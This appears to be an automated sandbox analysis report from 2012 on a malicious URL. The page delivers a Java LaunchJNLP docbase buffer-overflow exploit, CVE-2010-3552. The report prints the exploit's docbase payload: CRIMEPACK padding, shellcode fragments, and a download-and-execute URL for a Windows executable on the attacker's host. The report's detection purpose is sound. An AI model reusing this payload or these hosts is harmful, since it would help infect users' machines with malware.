Analysis report for http://spider.hitstrack.in/mdl/bof.php
Sample Overview
| URL | http://spider.hitstrack.in/mdl/bof.php |
| Domain | spider.hitstrack.in |
| Analysis Started | 2012-02-22 18:07:12 |
| Report Generated | 2012-02-22 18:07:15 |
| Jsand version | 2.3.2 |
See the report for domain spider.hitstrack.in.
Detection results
| Detector | Result |
| Jsand 2.3.2 | malicious |
In particular, the following URL was found to contain malicious content:
- http://spider.hitstrack.in/mdl/bof.php
Exploits
| Name | Description | Reference |
| Java Plugin LaunchJNLP DocBase | Stack based buffer overflow in Oracle Java 6 | CVE-2010-3552 |
Deobfuscation results
Evals
No evals.
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
| http://spider.hitstrack.in/mdl/bof.php | 200 | text/html |
Redirects
No redirects.
ActiveX controls
| CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA |
| Attributes |
| Name | Value |
| launchjnlp | 1 |
| docbase |
CRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPAC KCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPA CKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEPACKCRIMEP other 400 bytes f9J.u??\$.a??|`?l$$?E<?T.x.??J.?Z..??7I?4?.?1?1?????t.??..??????;|$(u??Z$.?f?.K? Z..??.?.??D$.a????????N.?RP?????V???6./pRP?????1?RRSUR???.?=?Z????~??sRP?q???1?R ???i?B???????.RP?Y???1?????????????RS?????????urlmon.dll?load.exe?http://spider. hitstrack.in/mdl/load.php?spl=java-docbase&b=&o=&i=java-docbase??. |
Shellcode
No shellcode was identified.
Malware
Additional (potential) malware:
| URL | Type | Hash | Analysis |
| http://spider.hitstrack.in/mdl/load.php?spl=java-docbase&b=&o=&i=java-docbase?? | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | 969262186d7272ae4c08eff7e7420c40 | |